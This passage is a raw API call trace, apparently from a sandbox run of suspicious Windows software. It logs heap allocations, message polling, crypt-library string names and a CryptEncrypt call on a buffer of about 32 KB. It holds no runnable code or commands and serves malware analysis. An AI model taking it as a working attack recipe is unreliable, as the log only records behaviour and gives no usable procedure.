dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0216.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c88 [0216.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0216.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0216.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0216.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0216.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0216.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0216.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0216.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0216.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0216.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80a1) returned 0x2f34178 [0216.523] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.523] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.523] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.523] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.523] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.523] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.523] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0216.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0216.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0216.523] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0216.523] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0216.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0216.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0216.524] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0216.524] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0216.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0216.524] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0216.524] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0216.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff48 | out: hHeap=0x970000) returned 1 [0216.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0216.524] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0216.524] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0216.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0216.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0216.524] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0216.524] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.525] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.525] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0216.525] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.525] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0216.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0216.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0216.525] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0216.525] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0216.526] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0216.526] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50c38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0216.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0216.526] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0216.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0216.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0216.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54328 [0216.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0216.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0216.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0216.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0216.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0216.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0216.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0216.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0216.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0216.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0216.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0216.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0216.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0216.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0216.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0216.527] CryptEncrypt (in: hKey=0xa87650, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x80a1, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x80a8) returned 1 [0216.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0216.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0216.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0216.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0216.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0216.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0216.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0216.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0216.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0216.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0216.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0216.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0216.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0216.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0216.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0216.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0216.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0216.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0216.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0216.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0216.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0216.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0216.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0216.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0216.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0216.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0216.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0216.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0216.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0216.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0216.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0216.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0216.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0216.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0216.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0216.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0216.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0216.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0216.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0216.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0216.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0216.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0216.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0216.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0216.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0216.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0216.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0216.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0216.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0216.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0216.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0216.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0216.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0216.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0216.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0216.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0216.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0216.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0216.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0216.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0216.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0216.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0216.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0216.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0216.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0216.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0216.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0216.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0216.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0216.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0216.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0216.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0216.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0216.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0216.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0216.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0216.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0216.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0216.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0216.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0216.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0216.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0216.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0216.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0216.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0216.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0216.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0216.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0216.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0216.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0216.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0216.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0216.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0216.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0216.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0216.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0216.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0216.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0216.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0216.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0216.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0216.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0216.530] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0216.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0216.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0216.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0216.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0216.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0216.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0216.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0216.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0216.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0216.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0216.530] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0216.531] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0216.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0216.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0216.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0216.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0216.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0216.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0216.531] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0216.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0216.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0216.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0216.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0216.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0216.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0216.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0216.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0216.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0216.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0216.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0216.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0216.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0216.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0216.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0216.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0216.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0216.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0216.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0216.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0216.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0216.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0216.532] CharLowerBuffW (in: lpsz="byte[32936]", cchLength=0xb | out: lpsz="byte[32936]") returned 0xb [0216.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0216.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0216.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0216.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0216.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0216.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0216.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0216.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0216.532] RtlAllocateHeap 